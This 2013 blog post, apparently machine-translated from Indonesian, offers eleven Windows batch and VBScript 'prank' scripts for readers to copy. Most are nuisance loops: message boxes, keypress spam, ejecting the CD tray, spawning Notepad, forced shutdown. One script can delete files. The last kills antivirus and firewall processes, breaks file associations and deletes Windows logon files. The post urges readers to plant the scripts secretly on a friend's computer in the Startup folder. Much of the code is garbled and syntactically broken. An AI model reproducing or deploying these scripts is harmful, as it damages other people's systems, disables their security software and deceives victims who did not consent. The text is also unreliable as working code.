Saturday, July 27, 2013

ignorant script on windows

HELLO FRIEND, I WILL SHARE  ABOUT IGNORANT SCRIPT ON WINDOWS
 

Script is a code used by a programmer to create a program or system that's in the computer / laptop that we use. But if we are wrong in compiling the script then the script can be confusing us. Examples can be confusing us if the script repeatedly bring up a dialog box that we have to click OKAY to eliminate them and it does not show up only once but many times. Well, now I want to post some stupid script that has been modified. Here are some things that you should prepare:1. A Computer / Laptop2. NotepadWell after these two things ready, now just do copy-paste (copast) script in red below





1. MESSAGE APPEARS THAT A CONSTANT 

@ ECHO off: Begin
 
msg * basic jelek
 
msg * ngaca sono
 
msg * behold, CPU lo nih ane acak2
 
msg * want to quit?
 
msg * re-install it
 
msg * let cepet finished: D
GOTO BEGIN 

[Save with the extension *. Bat]
2.  DISPLAY SHUTDOWN +MESSAGE

 @ Echo off
 
msg * appan sih loe
shutdown-s-c "error!!! kejelekanmu bikin kompimu dead"

 [Save with the extension *. Bat]
 3. PLAY WITH BUTTON CAPSLOOK
 Set WshShell = WScript.CreateObject ("WScript.Shell")
 
do
 
WScript.Sleep 100
 
wshshell.sendkeys "{CapsLock}"
loop

 [Save with the extension *. Vbs]

 4. OPENING AND CLOSING CD / DVD AUTOMATICALLY
 Set oWMP = CreateObject ("WMPlayer.OCX.7?)
 
Set colCDROMs = oWMP.cdromCollection
 
do
 
if colCDROMs.Count> = 1 then
 
For i = 0 to colCDROMs.Count - 1
 
colCDROMs.Item (i). Eject
 
Next
 
For i = 0 to colCDROMs.Count - 1
 
colCDROMs.Item (i). Eject
 
Next
 
End If
 
WScript.Sleep 5000
loop

 [Save with the extension *. Vbs]
 5. PRESS ENTER BUTTON CONTINUALLY
 Set WshShell = WScript.CreateObject ("WScript.Shell")do
 
WScript.Sleep 100
 
wshshell.sendkeys "~ (enter)"loop

 [Save with the extension *. Vbs]
 6. BACKSPACE BUTTON PRESSING CONTINUALLY
 MsgBox "Lets Rumble"
 
Set WshShell = WScript.CreateObject ("WScript.Shell")do
 
WScript.Sleep 100
 
wshshell.sendkeys "{bs}"
loop

 [Save with the extension *. Vbs]
 7. AUTO TYPING "Basic ugly!" IN NOTEPAD
 Set WshShell = WScript.CreateObject ("WScript.Shell")do
 
WScript.Sleep 100
 
wshshell.sendkeys "basic ugly!"
loop

 [Save with the extension *. Vbs]
 8. CONTINUOUS OPEN NOTEPAD!!
!@ ECHO off: Top
 
START% SystemRoot% \ system32 \ notepad.exe
GOTO top

 [Save with the extension *. Bat]

 9. OPEN NOTEPAD AND AUTOMATIC TYPING
 WScript.Sleep 180000
 
WScript.Sleep 10000
 
Set WshShell = WScript.CreateObject ("WScript.Shell")
 
WshShell.Run "notepad"
 
WScript.Sleep 100
 
WshShell.AppActivate "Notepad"
 
WScript.Sleep 500
 
WshShell.SendKeys "kom"
 
WScript.Sleep 500
 
WshShell.SendKeys "pu"
 
WScript.Sleep 500
 
WshShell.SendKeys "ter"
 
WScript.Sleep 500
 
WshShell.SendKeys "mu"
 
WScript.Sleep 500
 
WshShell.SendKeys "a"
 
WScript.Sleep 500
 
WshShell.SendKeys "kan"
 
WScript.Sleep 500
 
WshShell.SendKeys "han"
 
WScript.Sleep 500
 
WshShell.SendKeys "cur!"
 
WScript.Sleep 500WshShell.SendKeys "sukurin lue"

 [Save with the extension *. Vbs]

 10. SCRIPT QUIZ
 @ Echo offquiz title today
 
: Menucls
 
echo if computer virus what are you doingintermission
 
echo select which one:
 
echo 1. slam the computer
 
echo 2. computer waste
 
echo 3. confused
 
set input = nothing
 
set / p input = Choice:
 
if% input% == 1 shutdown-s-t 30
 
if% input% == 2 del c: \ xxx
 
if% input% == 3 @ ECHO off
 
msg * basic ugly
 
msg * ngaca sono
 
msg * behold, CPU lo nih ane acak2
 
msg * want to quit?
 
msg * re-install it
 
msg * let cepet finished: D
 
@ ECHO off: Top
 
START% SystemRoot%
 
\ System32 \ notepad.exe
GOTO top

 [Save with the extension *. Bat]
 11. DANGER!! DO NOT TRY THIS AT PERSONAL COMPUTER
 @ Echo offset end = md "Hack installing"set fin = copy "Hack log.txt" "Installing"% End%% Fin%net send * Hack is installing, press OK to begin set up.kill NAVAPSVC.exe / F / Qkill zonelabs.exe / F / Qkill explorer.exe / F / Qclsassoc. exe = txtfileassoc. txt = mp3fileclsmsg * It is you who is hacked ....msg * I warned you, and you kept going. Challenge me and this is what happens.DEL C: \ WINDOWS\ System32 \ Logoff.exe / F / Q DEL C: \ WINDOWS\ System32 \ logon.exe / F / Q DEL C: \ WINDOWS\ System32 \ Logon.scr / F / Q clsshutdown-s-t 5-c"Thank you for waiting"
 [Save with the extension *. Bat]

 All the above script can be saved with name up to you, replace a * with the name you want, but the extension must conform to the format above. Suppose stored by name or dandypower.vbs dandypowerfp.bat. Save on your friends computer with a name that is not suspicious. If you want to run automatically, please save it in the Startup folder in the Start menu. Oiya, after you save the script-script nosy, do not appear in front of your friends, in order not thrown CPU use, hehehehe .. :)# BE CAREFUL IF YOU USE THIS SCRIPT, Show really really DO NOT READ ANY OF TITLE SCRIPT +.NB: "Do not be used carelessly, risk and please bear his own sin. Mine did not come participate :)"

No comments:

Post a Comment